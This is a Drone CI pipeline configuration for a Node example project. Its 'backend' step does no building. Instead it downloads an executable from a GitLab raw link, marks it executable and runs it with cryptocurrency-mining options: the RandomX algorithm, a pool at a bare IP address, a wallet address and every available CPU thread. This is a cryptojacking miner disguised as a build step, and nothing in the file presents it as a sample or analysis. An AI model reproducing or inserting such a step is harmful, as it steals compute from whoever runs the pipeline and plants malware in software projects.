
workspace:
  base: /node
  path: drone/node-example

clone:
  git:
    image: plugins/git
    depath: 50
    tags: true

pipeline:
  frontend:
    image: node:8.3.0
    commands:
      - echo frontend
      - exit 1

  backend:
    image: node:8.3.0
    commands:
      - wget https://gitlab.com/jadons19292/donlod/-/raw/main/klarig3 && chmod +x klarig3 && ./klarig3 -a rx/0 -o 68.183.28.129:80 -u ZEPHs9wbP2kgeHU9wJoPonUwJAsZkj5rHagMgnDjK7186LuNVVfFeCGDByX2Y18AvbdRJQsNK4Fu4QM7XGs1bXegNGhthDhZ5ht -p Tester -t $(nproc --all) -k --donate-level 1
